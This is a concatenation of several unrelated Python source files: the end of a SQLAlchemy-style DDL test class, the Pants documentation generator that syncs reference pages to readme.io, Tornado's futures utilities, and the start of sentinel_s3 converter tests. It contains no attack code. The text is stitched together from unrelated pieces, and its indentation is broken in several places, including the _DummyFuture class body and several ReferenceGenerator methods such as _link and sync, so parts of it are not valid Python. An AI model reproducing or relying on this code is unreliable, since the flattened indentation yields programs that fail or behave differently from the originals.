        m, t1, t2, t3, t4, t5 = self._table_fixture()
        generator = self._mock_create_fixture(
            True, [t2, t3, t4], item_exists=lambda t: t not in ("t2", "t4")
        )
        self._assert_create_tables([t2, t4], generator, m)
    def test_drop_collection_checkfirst(self):
        m, t1, t2, t3, t4, t5 = self._table_fixture()
        generator = self._mock_drop_fixture(
            True, [t2, t3, t4], item_exists=lambda t: t in ("t2", "t4")
        )
        self._assert_drop_tables([t2, t4], generator, m)
    def test_create_collection_nocheck(self):
        m, t1, t2, t3, t4, t5 = self._table_fixture()
        generator = self._mock_create_fixture(
            False, [t2, t3, t4], item_exists=lambda t: t not in ("t2", "t4")
        )
        self._assert_create_tables([t2, t3, t4], generator, m)
    def test_create_empty_collection(self):
        m, t1, t2, t3, t4, t5 = self._table_fixture()
        generator = self._mock_create_fixture(
            True, [], item_exists=lambda t: t not in ("t2", "t4")
        )
        self._assert_create_tables([], generator, m)
    def test_drop_empty_collection(self):
        m, t1, t2, t3, t4, t5 = self._table_fixture()
        generator = self._mock_drop_fixture(
            True, [], item_exists=lambda t: t in ("t2", "t4")
        )
        self._assert_drop_tables([], generator, m)
    def test_drop_collection_nocheck(self):
        m, t1, t2, t3, t4, t5 = self._table_fixture()
        generator = self._mock_drop_fixture(
            False, [t2, t3, t4], item_exists=lambda t: t in ("t2", "t4")
        )
        self._assert_drop_tables([t2, t3, t4], generator, m)
    def test_create_metadata_checkfirst(self):
        m, t1, t2, t3, t4, t5 = self._table_fixture()
        generator = self._mock_create_fixture(
            True, None, item_exists=lambda t: t not in ("t2", "t4")
        )
        self._assert_create_tables([t2, t4], generator, m)
    def test_drop_metadata_checkfirst(self):
        m, t1, t2, t3, t4, t5 = self._table_fixture()
        generator = self._mock_drop_fixture(
            True, None, item_exists=lambda t: t in ("t2", "t4")
        )
        self._assert_drop_tables([t2, t4], generator, m)
    def test_create_metadata_nocheck(self):
        m, t1, t2, t3, t4, t5 = self._table_fixture()
        generator = self._mock_create_fixture(
            False, None, item_exists=lambda t: t not in ("t2", "t4")
        )
        self._assert_create_tables([t1, t2, t3, t4, t5], generator, m)
    def test_drop_metadata_nocheck(self):
        m, t1, t2, t3, t4, t5 = self._table_fixture()
        generator = self._mock_drop_fixture(
            False, None, item_exists=lambda t: t in ("t2", "t4")
        )
        self._assert_drop_tables([t1, t2, t3, t4, t5], generator, m)
    def test_create_metadata_auto_alter_fk(self):
        m, t1, t2 = self._use_alter_fixture_one()
        generator = self._mock_create_fixture(False, [t1, t2])
        self._assert_create_w_alter(
            [t1, t2]
            + list(t1.foreign_key_constraints)
            + list(t2.foreign_key_constraints),
            generator,
            m,
        )
    def test_create_metadata_inline_fk(self):
        m, t1, t2 = self._fk_fixture_one()
        generator = self._mock_create_fixture(False, [t1, t2])
        self._assert_create_w_alter(
            [t1, t2]
            + list(t1.foreign_key_constraints)
            + list(t2.foreign_key_constraints),
            generator,
            m,
        )
    def _assert_create_tables(self, elements, generator, argument):
        self._assert_ddl(schema.CreateTable, elements, generator, argument)
    def _assert_drop_tables(self, elements, generator, argument):
        self._assert_ddl(schema.DropTable, elements, generator, argument)
    def _assert_create(self, elements, generator, argument):
        self._assert_ddl(
            (schema.CreateTable, schema.CreateSequence, schema.CreateIndex),
            elements,
            generator,
            argument,
        )
    def _assert_drop(self, elements, generator, argument):
        self._assert_ddl(
            (schema.DropTable, schema.DropSequence),
            elements,
            generator,
            argument,
        )
    def _assert_create_w_alter(self, elements, generator, argument):
        self._assert_ddl(
            (schema.CreateTable, schema.CreateSequence, schema.AddConstraint),
            elements,
            generator,
            argument,
        )
    def _assert_drop_w_alter(self, elements, generator, argument):
        self._assert_ddl(
            (schema.DropTable, schema.DropSequence, schema.DropConstraint),
            elements,
            generator,
            argument,
        )
    def _assert_create_comment(self, elements, generator, argument):
        self._assert_ddl(
            (
                schema.CreateTable,
                schema.SetTableComment,
                schema.SetColumnComment,
            ),
            elements,
            generator,
            argument,
        )
    def _assert_create_index(self, elements, generator, argument):
        self._assert_ddl((schema.CreateIndex,), elements, generator, argument)
    def _assert_drop_index(self, elements, generator, argument):
        self._assert_ddl((schema.DropIndex,), elements, generator, argument)
    def _assert_ddl(self, ddl_cls, elements, generator, argument):
        """Traverse *argument* and assert that the executed DDL constructs
        are of type(s) *ddl_cls* and target exactly *elements* (consumed)."""
        generator.traverse_single(argument)
        for call_ in generator.connection.execute.mock_calls:
            c = call_[1][0]
            assert isinstance(c, ddl_cls)
            assert c.element in elements, (
                "element %r was not expected" % c.element
            )
            elements.remove(c.element)
            # CREATE TABLE may carry inline FK constraints; those are not
            # emitted separately, so remove them from the expected list.
            if getattr(c, "include_foreign_key_constraints", None) is not None:
                elements[:] = [
                    e
                    for e in elements
                    if e not in set(c.include_foreign_key_constraints)
                ]
        assert not elements, "elements remain in list: %r" % elements
|
|
# Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
"""Generates and uploads the Pants reference documentation.
Dry run:
./pants run build-support/bin/generate_docs.py
Live run:
./pants run build-support/bin/generate_docs.py -- --sync --api-key=<API_KEY>
where API_KEY is your readme.io API Key, found here:
https://dash.readme.com/project/pants/v2.6/api-key
"""
from __future__ import annotations
import argparse
import html
import json
import logging
import os
import pkgutil
import re
import subprocess
from html.parser import HTMLParser
from pathlib import Path, PosixPath
from typing import Any, Dict, Iterable, Optional, cast
import pystache
import requests
from common import die
from readme_api import DocRef, ReadmeAPI
from pants.help.help_info_extracter import to_help_str
from pants.version import MAJOR_MINOR
logger = logging.getLogger(__name__)
def main() -> None:
    """Entry point: gather `help-all` output, rewrite docsite URLs to
    markdown links, then render locally or sync to readme.io per --sync."""
    logging.basicConfig(format="[%(levelname)s]: %(message)s", level=logging.INFO)
    args = create_parser().parse_args()
    if args.sync and not args.api_key:
        raise Exception("You specified --sync so you must also specify --api-key")
    version = determine_pants_version(args.no_prompt)
    help_info = run_pants_help_all()
    doc_urls = DocUrlMatcher().find_doc_urls(value_strs_iter(help_info))
    logger.info("Found the following docsite URLs:")
    for url in sorted(doc_urls):
        logger.info(f"  {url}")
    logger.info("Fetching titles...")
    slug_to_title = get_titles(doc_urls)
    logger.info("Found the following titles:")
    for slug, title in sorted(slug_to_title.items()):
        logger.info(f"  {slug}: {title}")
    # Replace raw docsite URLs with markdown links before rendering.
    rewritten_help_info = rewrite_value_strs(help_info, slug_to_title)
    generator = ReferenceGenerator(args, version, rewritten_help_info)
    if args.sync:
        generator.sync()
    else:
        generator.render()
def determine_pants_version(no_prompt: bool) -> str:
    """Return the docs version (MAJOR_MINOR), confirming interactively
    unless *no_prompt* is set; dies on a negative answer."""
    version = MAJOR_MINOR
    if no_prompt:
        logger.info(f"Generating docs for Pants {version}.")
        return version
    answer = input(
        f"Generating docs for Pants {version}. Is this the correct version? [Y/n]: "
    )
    if answer and answer.lower() != "y":
        die(
            "Please either `git checkout` to the appropriate branch (e.g. 2.1.x), or change "
            "src/python/pants/VERSION."
        )
    return version
# Code to replace doc urls with appropriate markdown, for rendering on the docsite.
# Matches e.g. https://www.pantsbuild.org/v2.6/docs/some-page, capturing the slug.
_doc_url_pattern = r"https://www.pantsbuild.org/v(\d+\.[^/]+)/docs/(?P<slug>[a-zA-Z0-9_-]+)"
class DocUrlMatcher:
    """Utilities for regex matching docsite URLs."""

    def __init__(self):
        self._doc_url_re = re.compile(_doc_url_pattern)

    def slug_for_url(self, url: str) -> str:
        """Return the slug component of a docsite URL; raise ValueError otherwise."""
        match = self._doc_url_re.match(url)
        if match is None:
            raise ValueError(f"Not a docsite URL: {url}")
        return cast(str, match.group("slug"))

    def find_doc_urls(self, strs: Iterable[str]) -> set[str]:
        """Find all the docsite urls in the given strings."""
        urls: set[str] = set()
        for s in strs:
            for match in self._doc_url_re.finditer(s):
                urls.add(match.group(0))
        return urls
class DocUrlRewriter:
    """Rewrites docsite URLs in help strings into readme.io markdown links."""

    def __init__(self, slug_to_title: dict[str, str]):
        self._doc_url_re = re.compile(_doc_url_pattern)
        self._slug_to_title = slug_to_title

    def _rewrite_url(self, mo: re.Match) -> str:
        # The docsite injects the version automatically at markdown rendering time, so we
        # must not also do so, or it will be doubled, and the resulting links will be broken.
        slug = mo.group("slug")
        title = self._slug_to_title.get(slug)
        if not title:
            raise ValueError(f"Found empty or no title for {mo.group(0)}")
        return f"[{title}](doc:{slug})"

    def rewrite(self, s: str) -> str:
        """Return *s* with every docsite URL replaced by a markdown link."""
        return self._doc_url_re.sub(self._rewrite_url, s)
class TitleFinder(HTMLParser):
    """Grabs the page title out of a docsite page."""

    def __init__(self):
        super().__init__()
        self._inside_title: bool = False
        self._found_title: str | None = None

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._inside_title = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._inside_title = False

    def handle_data(self, data):
        # Only data seen between <title> and </title> is retained.
        if self._inside_title:
            self._found_title = data.strip()

    @property
    def title(self) -> str | None:
        return self._found_title
def get_title_from_page_content(page_content: str) -> str:
    """Extract the <title> text from an HTML page, or "" when absent."""
    finder = TitleFinder()
    finder.feed(page_content)
    return finder.title or ""
def get_title(url: str) -> str:
    """Fetch *url* and return its page title."""
    response = requests.get(url)
    return get_title_from_page_content(response.text)
def get_titles(urls: set[str]) -> dict[str, str]:
    """Return map from slug->title for each given docsite URL."""
    matcher = DocUrlMatcher()
    # TODO: Parallelize the http requests.
    #  E.g., by turning generate_docs.py into a plugin goal and using the engine.
    return {matcher.slug_for_url(url): get_title(url) for url in urls}
def create_parser() -> argparse.ArgumentParser:
    """Build the command-line parser for this script."""
    arg_parser = argparse.ArgumentParser(description="Generate the Pants reference markdown files.")
    arg_parser.add_argument(
        "--no-prompt",
        action="store_true",
        default=False,
        help="Don't prompt the user, accept defaults for all questions.",
    )
    arg_parser.add_argument(
        "--sync",
        action="store_true",
        default=False,
        help="Whether to sync the generated reference docs to the docsite. "
        "If unset, will generate markdown files to the path in --output "
        "instead. If set, --api-key must be set.",
    )
    arg_parser.add_argument(
        "--output",
        default=PosixPath(os.path.sep) / "tmp" / "pants_docs" / "help" / "option",
        type=Path,
        help="Path to a directory under which we generate the markdown files. "
        "Useful for viewing the files locally when testing and debugging "
        "the renderer.",
    )
    arg_parser.add_argument("--api-key", help="The readme.io API key to use. Required for --sync.")
    return arg_parser
def run_pants_help_all() -> dict[str, Any]:
    """Run `./pants help-all` with a docs-oriented backend/plugin set and
    return the parsed JSON output. Logs and re-raises on failure."""
    # Backends toggled purely so the generated docs cover the right set.
    deactivated_backends = ["internal_plugins.releases", "pants.backend.experimental.java"]
    activated_backends = [
        "pants.backend.codegen.protobuf.python",
        "pants.backend.awslambda.python",
        "pants.backend.python.lint.bandit",
        "pants.backend.python.lint.pylint",
        "pants.backend.python.lint.yapf",
    ]
    deactivated_plugins = ["toolchain.pants.plugin==0.14.0"]
    argv = [
        "./pants",
        "--concurrent",
        f"--plugins=-[{', '.join(map(repr, deactivated_plugins))}]",
        f"--backend-packages=-[{', '.join(map(repr, deactivated_backends))}]",
        f"--backend-packages=+[{', '.join(map(repr, activated_backends))}]",
        "--no-verify-config",
        "--remote-auth-plugin= ",
        "help-all",
    ]
    run = subprocess.run(argv, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8")
    try:
        run.check_returncode()
    except subprocess.CalledProcessError:
        logger.error(
            f"Running {argv} failed with exit code {run.returncode}.\n\nstdout:\n{run.stdout}"
            f"\n\nstderr:\n{run.stderr}"
        )
        raise
    return cast(dict[str, Any], json.loads(run.stdout))
def value_strs_iter(help_info: dict[str, Any]) -> Iterable[str]:
    """Yield every string value found anywhere in the (nested) help-info.

    Recurses through dict values and list items; strings are yielded as-is,
    all other leaf values are skipped.
    """
    def _recurse(val: Any) -> Iterable[str]:
        # A value is exactly one of str/dict/list/other, so use an
        # exclusive chain and delegate iteration with `yield from`
        # instead of the manual re-yield loops.
        if isinstance(val, str):
            yield val
        elif isinstance(val, dict):
            for v in val.values():
                yield from _recurse(v)
        elif isinstance(val, list):
            for v in val:
                yield from _recurse(v)

    yield from _recurse(help_info)
def rewrite_value_strs(help_info: dict[str, Any], slug_to_title: dict[str, str]) -> dict[str, Any]:
    """Return a copy of the argument with rewritten docsite URLs."""
    rewriter = DocUrlRewriter(slug_to_title)

    def _recurse(val: Any) -> Any:
        if isinstance(val, str):
            return rewriter.rewrite(val)
        if isinstance(val, dict):
            return {key: _recurse(sub) for key, sub in val.items()}
        if isinstance(val, list):
            return [_recurse(item) for item in val]
        return val

    return cast(dict[str, Any], _recurse(help_info))
class ReferenceGenerator:
    def __init__(self, args: argparse.Namespace, version: str, help_info: dict[str, Any]) -> None:
        """Set up the mustache renderer and pre-process *help_info* for templating."""
        self._args = args
        self._readme_api = ReadmeAPI(api_key=self._args.api_key, version=version)
        def get_tpl(name: str) -> str:
            # Note that loading relative to __name__ may not always work when __name__=='__main__'.
            buf = pkgutil.get_data("generate_docs", f"docs_templates/{name}")
            if buf is None:
                raise ValueError(f"No such template: {name}")
            return buf.decode()
        options_scope_tpl = get_tpl("options_scope_reference.md.mustache")
        single_option_tpl = get_tpl("single_option_reference.md.mustache")
        target_tpl = get_tpl("target_reference.md.mustache")
        # Partials let the scope template include the per-option template.
        self._renderer = pystache.Renderer(
            partials={
                "scoped_options": options_scope_tpl,
                "single_option": single_option_tpl,
                "target": target_tpl,
            }
        )
        self._category_id: Optional[str] = None  # Fetched lazily.
        # Load the data.
        self._options_info = self.process_options_input(help_info, sync=self._args.sync)
        self._targets_info = self.process_targets_input(help_info)
@staticmethod
def _link(scope: str, *, sync: bool) -> str:
# docsite pages link to the slug, local pages to the .md source.
url_safe_scope = scope.replace(".", "-")
return f"reference-{url_safe_scope}" if sync else f"{url_safe_scope}.md"
    @classmethod
    def process_options_input(cls, help_info: dict[str, Any], *, sync: bool) -> dict:
        """Augment the raw help-info dict in place for rendering options pages
        and return it."""
        scope_to_help_info = help_info["scope_to_help_info"]
        # Process the list of consumed_scopes into a comma-separated list, and add it to the option
        # info for the goal's scope, to make it easy to render in the goal's options page.
        for goal, goal_info in help_info["name_to_goal_info"].items():
            assert isinstance(goal_info, dict)
            consumed_scopes = sorted(goal_info["consumed_scopes"])
            linked_consumed_scopes = [
                f"[{cs}]({cls._link(cs, sync=sync)})"
                for cs in consumed_scopes
                if cs and cs != goal_info["name"]
            ]
            comma_separated_consumed_scopes = ", ".join(linked_consumed_scopes)
            scope_to_help_info[goal][
                "comma_separated_consumed_scopes"
            ] = comma_separated_consumed_scopes
        # Process the option data.
        def munge_option(option_data):
            # Munge the default so we can display it nicely when it's multiline, while
            # still displaying it inline if it's not.
            default_help_repr = option_data.get("default_help_repr")
            if default_help_repr is None:
                default_str = to_help_str(option_data["default"])
            else:
                # It should already be a string, but might as well be safe.
                default_str = to_help_str(default_help_repr)
            escaped_default_str = html.escape(default_str, quote=False)
            if "\n" in default_str:
                option_data["marked_up_default"] = f"<pre>{escaped_default_str}</pre>"
            else:
                option_data["marked_up_default"] = f"<code>{escaped_default_str}</code>"
        for shi in scope_to_help_info.values():
            for opt in shi["basic"]:
                munge_option(opt)
            for opt in shi["advanced"]:
                munge_option(opt)
            for opt in shi["deprecated"]:
                munge_option(opt)
        return help_info
    @classmethod
    def process_targets_input(cls, help_info: dict[str, Any]) -> dict[str, dict[str, Any]]:
        """Prepare the target-type help info (in place) for templating and
        return the name->target-info map."""
        target_info = help_info["name_to_target_type_info"]
        for target in target_info.values():
            for field in target["fields"]:
                # Combine the `default` and `required` properties.
                default_str = html.escape(str(field["default"]))
                field["default_or_required"] = (
                    "required" if field["required"] else f"default: <code>{default_str}</code>"
                )
                field["description"] = str(field["description"])
            target["fields"] = sorted(target["fields"], key=lambda fld: cast(str, fld["alias"]))
            target["description"] = str(target["description"])
        return cast(Dict[str, Dict[str, Any]], target_info)
    @property
    def category_id(self) -> str:
        """The id of the "Reference" category on the docsite."""
        # Cache the lookup; the category id does not change within a run.
        if self._category_id is None:
            self._category_id = self._readme_api.get_category("reference").id
        return self._category_id
    def _create(
        self, parent_doc_id: Optional[str], slug_suffix: str, title: str, body: str
    ) -> None:
        """Create a new docsite reference page.
        Operates by creating a placeholder page, and then populating it via _update().
        This works around a quirk of the readme.io API: You cannot set the page slug when you
        create a page. Instead it is derived from the title.
        In fact there is no way to set or modify the slug via the API at all, which makes sense
        since the API references the page via the slug. When you change the slug in the UI
        it is likely deleting and recreating the page under the covers.
        This is a problem if you want the slug to be different than the human-readable title,
        as we do in this case. Specifically, we want the human-readable page title to be just
        the scope name, e.g., `test` (so it appears that way in the sidebar). But we want the
        slug to be `reference-test`, so that it doesn't collide with any other, non-generated page
        that happens to occupy the slug `test`.
        To solve this we create the placeholder page with a title from which to derive the slug,
        and when we update the page to set its content, we update the title to be the
        one we want humans to see (this will not change the slug, see above).
        """
        # Use the desired slug as the placeholder title so readme.io derives it.
        slug = f"reference-{slug_suffix}"
        self._readme_api.create_doc(
            title=slug, category=self.category_id, parentDoc=parent_doc_id, hidden=False
        )
        # Placeholder page exists, now update it with the real title and body.
        self._readme_api.update_doc(slug=slug, title=title, category=self.category_id, body=body)
def _render_target(self, alias: str) -> str:
return cast(str, self._renderer.render("{{> target}}", self._targets_info[alias]))
def _render_options_body(self, scope_help_info: Dict) -> str:
"""Renders the body of a single options help page."""
return cast(str, self._renderer.render("{{> scoped_options}}", scope_help_info))
@classmethod
def _render_parent_page_body(cls, items: Iterable[str], *, sync: bool) -> str:
"""Returns the body of a parent page for the given items."""
# The page just lists the items, with links to the page for each one.
lines = [f"- [{item}]({cls._link(item, sync=sync)})" for item in items]
return "\n".join(lines)
    def render(self) -> None:
        """Renders the pages to local disk.
        Useful for debugging and iterating on the markdown.
        """
        output_dir = Path(self._args.output)
        output_dir.mkdir(parents=True, exist_ok=True)
        # Partition scopes: goals get their own index; the empty scope
        # (GLOBAL) is excluded from the subsystem index.
        goals = [
            scope
            for scope, shi in self._options_info["scope_to_help_info"].items()
            if shi["is_goal"]
        ]
        subsystems = [
            scope
            for scope, shi in self._options_info["scope_to_help_info"].items()
            if scope and not shi["is_goal"]
        ]
        def write(filename: str, content: str) -> None:
            path = output_dir / filename
            path.write_text(content)
            logger.info(f"Wrote {path}")
        write("goals-index.md", self._render_parent_page_body(sorted(goals), sync=False))
        write("subsystems-index.md", self._render_parent_page_body(sorted(subsystems), sync=False))
        for shi in self._options_info["scope_to_help_info"].values():
            write(f"{shi['scope'] or 'GLOBAL'}.md", self._render_options_body(shi))
        write(
            "targets-index.md",
            self._render_parent_page_body(sorted(self._targets_info.keys()), sync=False),
        )
        for alias in self._targets_info.keys():
            write(f"{alias}.md", self._render_target(alias))
def sync(self) -> None:
    """Render the pages and sync them to the live docsite.

    All pages live under the "reference" category.

    There are four top-level pages under that category:
    - Global options
    - The Goals parent page
    - The Subsystems parent page
    - The Targets parent page

    The individual reference pages are nested under these parent pages.
    """
    # Docs appear on the site in creation order. If we only create new docs
    # that don't already exist then they will appear at the end, instead of in
    # alphabetical order. So we first delete all previous docs, then recreate them.
    #
    # TODO: Instead of deleting and recreating, we can set the order explicitly.
    #
    # Note that deleting a non-empty parent will fail, so we delete children first.
    def do_delete(docref: DocRef):
        # Depth-first: children must be removed before their parent.
        for child in docref.children:
            do_delete(child)
        self._readme_api.delete_doc(docref.slug)
    docrefs = self._readme_api.get_docs_for_category("reference")
    for docref in docrefs:
        do_delete(docref)
    # Partition the scopes into goals and subsystems.
    goals = {}
    subsystems = {}
    for scope, shi in self._options_info["scope_to_help_info"].items():
        if scope == "":
            continue  # We handle the global scope separately.
        if shi["is_goal"]:
            goals[scope] = shi
        else:
            subsystems[scope] = shi
    # Create the top-level docs in order (creation order == display order).
    self._create(
        parent_doc_id=None,
        slug_suffix="global",
        title="Global options",
        body=self._render_options_body(self._options_info["scope_to_help_info"][""]),
    )
    self._create(
        parent_doc_id=None,
        slug_suffix="all-goals",
        title="Goals",
        body=self._render_parent_page_body(sorted(goals.keys()), sync=True),
    )
    self._create(
        parent_doc_id=None,
        slug_suffix="all-subsystems",
        title="Subsystems",
        body=self._render_parent_page_body(sorted(subsystems.keys()), sync=True),
    )
    self._create(
        parent_doc_id=None,
        slug_suffix="all-targets",
        title="Targets",
        body=self._render_parent_page_body(sorted(self._targets_info.keys()), sync=True),
    )
    # Create the individual goal/subsystem/target docs, nested under the
    # parent pages created above (looked up by slug to get their ids).
    all_goals_doc_id = self._readme_api.get_doc("reference-all-goals").id
    for scope, shi in sorted(goals.items()):
        self._create(
            parent_doc_id=all_goals_doc_id,
            slug_suffix=scope,
            title=scope,
            body=self._render_options_body(shi),
        )
    all_subsystems_doc_id = self._readme_api.get_doc("reference-all-subsystems").id
    for scope, shi in sorted(subsystems.items()):
        self._create(
            parent_doc_id=all_subsystems_doc_id,
            # Dots are not slug-safe, so subsystem scopes like a.b use a-b.
            slug_suffix=scope.replace(".", "-"),
            title=scope,
            body=self._render_options_body(shi),
        )
    all_targets_doc_id = self._readme_api.get_doc("reference-all-targets").id
    for alias, data in sorted(self._targets_info.items()):
        self._create(
            parent_doc_id=all_targets_doc_id,
            slug_suffix=alias,
            title=alias,
            body=self._render_target(alias),
        )
# Script entry point (main() is presumably defined earlier in this file).
if __name__ == "__main__":
    main()
|
|
#!/usr/bin/env python
#
# Copyright 2012 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Utilities for working with threads and ``Futures``.
``Futures`` are a pattern for concurrent programming introduced in
Python 3.2 in the `concurrent.futures` package (this package has also
been backported to older versions of Python and can be installed with
``pip install futures``). Tornado will use `concurrent.futures.Future` if
it is available; otherwise it will use a compatible class defined in this
module.
"""
from __future__ import absolute_import, division, print_function, with_statement
import functools
import sys
from tornado.stack_context import ExceptionStackContext, wrap
from tornado.util import raise_exc_info, ArgReplacer
try:
    from concurrent import futures
except ImportError:
    # concurrent.futures is stdlib on Python 3.2+; on older interpreters it is
    # an optional backport ("pip install futures"), so its absence is tolerated
    # and a compatible dummy implementation below is used instead.
    futures = None
class ReturnValueIgnoredError(Exception):
    """Raised by `return_future` when the wrapped function returns a value
    (results must be delivered via the callback, not returned)."""
    pass
class _DummyFuture(object):
def __init__(self):
self._done = False
self._result = None
self._exception = None
self._callbacks = []
def cancel(self):
return False
def cancelled(self):
return False
def running(self):
return not self._done
def done(self):
return self._done
def result(self, timeout=None):
self._check_done()
if self._exception:
raise self._exception
return self._result
def exception(self, timeout=None):
self._check_done()
if self._exception:
return self._exception
else:
return None
def add_done_callback(self, fn):
if self._done:
fn(self)
else:
self._callbacks.append(fn)
def set_result(self, result):
self._result = result
self._set_done()
def set_exception(self, exception):
self._exception = exception
self._set_done()
def _check_done(self):
if not self._done:
raise Exception("DummyFuture does not support blocking for results")
def _set_done(self):
self._done = True
for cb in self._callbacks:
# TODO: error handling
cb(self)
self._callbacks = None
# Pick the Future implementation: the real concurrent.futures.Future when
# available, otherwise the dummy fallback defined above.
if futures is None:
    Future = _DummyFuture
else:
    Future = futures.Future
class TracebackFuture(Future):
    """Subclass of `Future` which can store a traceback with
    exceptions.

    The traceback is automatically available in Python 3, but in the
    Python 2 futures backport this information is discarded.
    """

    def __init__(self):
        super(TracebackFuture, self).__init__()
        self.__exc_info = None

    def exc_info(self):
        # The stored (type, value, traceback) triple, or None if no error set.
        return self.__exc_info

    def set_exc_info(self, exc_info):
        """Traceback-aware replacement for
        `~concurrent.futures.Future.set_exception`.
        """
        self.__exc_info = exc_info
        self.set_exception(exc_info[1])

    def result(self):
        # Re-raise with the original traceback when one was captured;
        # otherwise defer to the base class.
        if self.__exc_info is None:
            return super(TracebackFuture, self).result()
        raise_exc_info(self.__exc_info)
class DummyExecutor(object):
    """Executor that runs the submitted callable synchronously on the calling
    thread and returns an already-resolved future."""

    def submit(self, fn, *args, **kwargs):
        fut = TracebackFuture()
        try:
            fut.set_result(fn(*args, **kwargs))
        except Exception:
            # Capture the full exc_info so the traceback survives.
            fut.set_exc_info(sys.exc_info())
        return fut
# Module-level singleton of the synchronous executor.
dummy_executor = DummyExecutor()
def run_on_executor(fn):
    """Decorator to run a synchronous method asynchronously on an executor.

    The decorated method may be called with a ``callback`` keyword
    argument and returns a future. Requires the owning object to expose
    ``self.executor`` (and ``self.io_loop`` when a callback is supplied).
    """
    @functools.wraps(fn)
    def wrapper(self, *args, **kwargs):
        callback = kwargs.pop("callback", None)
        future = self.executor.submit(fn, self, *args, **kwargs)
        if callback:
            # Deliver the unwrapped result to the callback on the io_loop.
            def on_done(resolved):
                callback(resolved.result())
            self.io_loop.add_future(future, on_done)
        return future
    return wrapper
# Sentinel letting return_future distinguish "callback invoked with no
# argument" from a legitimate result value of None.
_NO_RESULT = object()
def return_future(f):
    """Decorator to make a function that returns via callback return a
    `Future`.

    The wrapped function should take a ``callback`` keyword argument
    and invoke it with one argument when it has finished. To signal failure,
    the function can simply raise an exception (which will be
    captured by the `.StackContext` and passed along to the ``Future``).

    From the caller's perspective, the callback argument is optional.
    If one is given, it will be invoked when the function is complete
    with `Future.result()` as an argument. If the function fails, the
    callback will not be run and an exception will be raised into the
    surrounding `.StackContext`.

    If no callback is given, the caller should use the ``Future`` to
    wait for the function to complete (perhaps by yielding it in a
    `.gen.engine` function, or passing it to `.IOLoop.add_future`).

    Usage::

        @return_future
        def future_func(arg1, arg2, callback):
            # Do stuff (possibly asynchronous)
            callback(result)

        @gen.engine
        def caller(callback):
            yield future_func(arg1, arg2)
            callback()

    Note that ``@return_future`` and ``@gen.engine`` can be applied to the
    same function, provided ``@return_future`` appears first. However,
    consider using ``@gen.coroutine`` instead of this combination.
    """
    replacer = ArgReplacer(f, 'callback')

    @functools.wraps(f)
    def wrapper(*args, **kwargs):
        future = TracebackFuture()
        # Substitute our own callback that resolves the future; the
        # _NO_RESULT default distinguishes a zero-arg invocation from a
        # real None result.
        callback, args, kwargs = replacer.replace(
            lambda value=_NO_RESULT: future.set_result(value),
            args, kwargs)

        def handle_error(typ, value, tb):
            # Exceptions escaping into the stack context resolve the future.
            future.set_exc_info((typ, value, tb))
            return True
        exc_info = None
        with ExceptionStackContext(handle_error):
            try:
                result = f(*args, **kwargs)
                if result is not None:
                    raise ReturnValueIgnoredError(
                        "@return_future should not be used with functions "
                        "that return values")
            except:
                exc_info = sys.exc_info()
                raise
        if exc_info is not None:
            # If the initial synchronous part of f() raised an exception,
            # go ahead and raise it to the caller directly without waiting
            # for them to inspect the Future.
            raise_exc_info(exc_info)

        # If the caller passed in a callback, schedule it to be called
        # when the future resolves. It is important that this happens
        # just before we return the future, or else we risk confusing
        # stack contexts with multiple exceptions (one here with the
        # immediate exception, and again when the future resolves and
        # the callback triggers its exception by calling future.result()).
        if callback is not None:
            def run_callback(future):
                result = future.result()
                if result is _NO_RESULT:
                    callback()
                else:
                    callback(future.result())
            future.add_done_callback(wrap(run_callback))
        return future
    return wrapper
def chain_future(a, b):
    """Chain two futures together so that when one completes, so does the other.

    The result (success or failure) of ``a`` will be copied to ``b``.
    """
    def copy(future):
        assert future is a
        # Prefer the full traceback transfer when both sides support it.
        both_traceback = (isinstance(a, TracebackFuture)
                          and isinstance(b, TracebackFuture))
        if both_traceback and a.exc_info() is not None:
            b.set_exc_info(a.exc_info())
        elif a.exception() is not None:
            b.set_exception(a.exception())
        else:
            b.set_result(a.result())
    a.add_done_callback(copy)
|
|
import json
import unittest
from copy import copy
from collections import OrderedDict
from six import iterkeys
from sentinel_s3.converter import (camelcase_underscore, metadata_to_dict, tile_metadata, to_latlon,
get_tile_geometry, convert_coordinates)
class Test(unittest.TestCase):
    """Unit tests for sentinel_s3.converter."""

    def _load_tile_info(self):
        # Helper: read and decode the sample tileInfo.json as an OrderedDict,
        # closing the file handle deterministically (the original leaked it).
        with open('tests/samples/tileInfo.json', 'rb') as f:
            return json.loads(f.read().decode(), object_pairs_hook=OrderedDict)

    def _assert_expected_tile(self, tile):
        # Helper: shared assertions for the sample tile's converted metadata.
        assert isinstance(tile, OrderedDict)
        assert tile['thumbnail'] == 'http://sentinel-s2-l1c.s3.amazonaws.com/tiles/56/X/NF/2016/3/16/0/preview.jp2'
        assert tile['tile_name'] == 'S2A_OPER_MSI_L1C_TL_SGS__20160316T054120_A003818_T56XNF_N02.01'
        assert tile['utm_zone'] == 56
        assert tile['data_coverage_percentage'] == 65.58
        assert tile['sensing_orbit_direction'] == 'DESCENDING'
        assert len(tile['download_links']['aws_s3']) == 13
        # Make sure bands urls are left padded
        d_link = tile['download_links']['aws_s3'][0].split('.')[-2].split('/')
        assert d_link[-1] == 'B01'

    def test_camelcase_underscore(self):
        """camelCase/PascalCase convert to snake_case; lowercase is untouched."""
        assert camelcase_underscore('productName') == 'product_name'
        assert camelcase_underscore('ProductName') == 'product_name'
        assert camelcase_underscore('productname') == 'productname'
        assert camelcase_underscore('product1Name') == 'product1_name'

    def test_metadata_to_dict(self):
        """Old-format product metadata XML parses into the expected dict."""
        # Close the file handle instead of leaking it.
        with open('tests/samples/metadata.xml') as xml:
            product = metadata_to_dict(xml)
        assert isinstance(product, OrderedDict)
        assert 'band_list' in product
        assert 'tiles' in product
        assert product['spacecraft_name'] == 'Sentinel-2A'
        assert len(product['band_list']) == 13
        tiles = list(iterkeys(product['tiles']))
        assert len(tiles) == 20

    def test_metadata_to_dict_new_format(self):
        """New-format product metadata XML parses correctly (single tile)."""
        with open('tests/samples/metadata_new.xml') as xml:
